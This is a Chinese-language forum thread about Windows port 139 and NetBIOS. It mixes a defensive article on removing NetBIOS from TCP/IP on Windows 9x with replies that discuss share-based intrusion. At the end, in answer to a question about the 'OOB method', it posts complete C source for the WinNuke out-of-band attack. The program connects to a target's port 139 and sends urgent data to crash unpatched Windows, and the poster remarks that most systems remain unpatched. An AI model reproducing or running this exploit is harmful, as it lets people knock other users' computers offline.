你不开这个端口怎么用OICQ啊~怎么上网啊!

放心睡觉吧!

看流光说明书!

一般看看可以共享入侵!

139 端口的名称为 NETBIOS Session Service
MICROSOFT NETWORK 使用NETBIOS这个协议进行通信，如"网上邻居"就是使用NETBIOS这个协议，如果你的网络设置有NETBIOS这个协议的话，139端口就会打开，在win98中如果你安装了网卡，通常就会有这个协议存在，这是一个正常的端口，开了并不是漏洞

INTERNET的通信协议是TCP/IP，即使139端口不开，包括OICQ EMAIL IE 在内的所有INTERNET应用程序都能100%正常运行。

而共享入侵就必须用到139这个端口，是共享入侵的必要条件之一，即使不一定会入侵成功，但利用139这个端口进行IP攻击就是完全可能的了，很久以前就有这样的程序了（我也写过了一个），没有打过补丁的WIN98不出1秒钟保证你蓝屏，在30秒内死机，所以，如果你并不是局域网的其中一部机的话，建议你把NETBIOS协议删掉，关闭139端口

许多人知道，NetBIOS 是计算机局域网领域流行的一种传输方式，但你是否还知道，对于互联网用户来讲，NetBIOS 则是安全领域的一大隐患。

　一、NetBIOS 的烦恼 　

NetBIOS 是指网络输入输出系统，在计算机网络发展史中，NetBIOS 算得上是历史悠久。早在 1985 年，IBM 公司就开始在网络领域使用 NetBIOS，微软推出第一套基于 Windows 的网络操作系统－－Windows For Workgroups（面向工作组的视窗操作系统）时，就采用了一种适用于 Windows 的 NetBIOS 版本，即 NetBEUI。微软当年之所以选择 NetBEUI 作为网络传输的基本协议，是因为它占用系统资源少、传输效率高，尤为适用于由 20 到 200 台计算机组成的小型局域网。此外，NetBEUI 还有一个最大的优点：可以方便地实现网络中各单机资源的共享。

后来，网络的发展速度之快，已大大超出人们的想象，进入 20 世纪未，全球的计算机就已可通过国际互联网络方便连接，随着互联网络的迅猛发展，TCP/IP 协议成为广泛使用的传输协议。

今天，TCP/IP 协议已是互联网领域的通用协议，几乎所有接入互联网的电脑都使用 TCP/IP。但同时，NetBEUI 协议也还在局域网领域广泛使用，因此，在你安装 TCP/IP 协议时，NetBIOS 也被 Windows 作为默认设置载入了你的电脑，而电脑随即也具有了 NetBIOS 本身的开放性。换句话讲，在不知不觉间，你的上网电脑已被打开了一个危险的“后门”。

NetBIOS 的开放，意味着你的硬盘可能会在网络中成为共享。对于网上四处游走的 来讲，他们可以通过 NetBIOS 获知你电脑中的一切！

　　二、找寻电脑中开放的“后门” 　　

在想办法关闭电脑的这个“后门”前，我们有必要先认识这个问题：网络中的其它用户是怎样找到你系统漏洞的？

你可能认为：在茫茫网海，作为个人上网用户，我的一台电脑是多么的渺小，HACKER 们怎会对我感兴趣呢？其实，这种想法是很危险的，网上一些不怀好意的用户（很多还称不上是 ），说不定哪天就会盯上你。 　　现在，有许多被称作“扫描机（scanners）”的黑客小程序，这些扫描程序不停地穿梭于网络之中，专门寻找上网用户的系统漏洞，其中就包括 NetBIOS 及 Windows “文件及打印共享”功能所打开的系统后门。一旦扫描程序在网上发现了系统存在着漏洞的计算机，那些恶意攻击者就会设法通过找到的“后门”进入你的计算机，并获取你的信息。而令人深感不安的是，所有的这些非法入侵行为，你可能竟然毫无知觉。

　　三、关闭你的“后门” 　　

正如前文所述，系统存在后门的原因是与 TCP/IP 协议捆绑在一起的 NetBIOS,事实上，对于互联网上的单机用户来讲，NetBIOS 是没有什么用处的，因此，你完全可以将它从 TCP/IP 中去掉。下面，就现在常见的几种操作系统介绍从TCP/IP 中解除 NetBIOS 的方法。

如果你使用的是最早版本的 Windows 95，那关闭 NetBIOS 就是一件非常容易的事：找到系统里名为 Vnbt.386 的文件，随便将它改个名，如改为 Vnbt.out，这就算大功告成了。

如果你使用的是 Windows 95改进版、Windows 98、Windows 98 SE 或是 Windows Me,那就要稍微麻烦一点。首先，打开控制面板，进入“网络”对话窗，在配置表中，查看列表中是否已有 NetBEUI 组件，如果有，则直接跳过下一段。 　　如果在列表中没有 NetBEUI 组件，则先点击“添加”按钮，在“要安装的网络组件类型”列表中，选择“协议”一项，再次点击“添加”，在“网络协议”对话窗中，选择 Microsoft 的 NetBEUI，然后，插入 Windows 安装盘，点击“确定”即可。

回到“网络”对话窗，在网络组件中选择“拨号适配器”，点击“属性”，在“属性”对话窗中选择“绑定”按钮，将除TCP/IP之外其它协议的复选框里的小勾清除掉。 　　最后，再次回到“网络”对话窗，选择 TCP/IP 协议，点击“属性”，这时有可能会弹出一个警告窗口，不用理它，直接点“OK”就行了，进入 TCP/IP 的“属性”窗口后，选择“绑定”，将所有网络协议复选框内的小勾去掉，点击“确定”，这时，Windows 会提示你至少应选择一种协议，仍然不用理它，点击“No”，关闭窗口。重新启动你的计算机，这样，你计算机中的 NetBIOS 后门就已被关闭了。

这样一来，NetBIOS 已从你计算机的 TCP/IP 协议中去除,当然，你最好检查一下操作是否成功：回到“网络”对话窗，选择 TCP/IP 协议，点击“属性”，在“属性”窗口中点击 NetBIOS 栏，这时，你会看到“我希望在 TCP/IP 协议中开启 NetBIOS（I want to enable NetBIOS over TCP/IP）”一项，该项前面的复选框应该没有打勾。

现在，你就可以放心地在网络中漫游，而不必再担心有人会通过 NetBIOS 入侵你的电脑。

------------------
每个人都有无法忘记的人，思念会像细沙穿过你的灵魂，轻轻开了门，只有风雨声。

引用:

---

发起人 lcflying:
OOB的方式} 是什么呢？

---

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);

if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}

if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}

void main(int argc, char *argv[]) {

if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}

if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

open_sock(s,argv[1],dport);

printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
为适应于Win9x、WinNT系统下，只需稍微修改，这里不再说明。
虽然微软已经为它的Bugs出了补丁了，但大部份的系统还是……。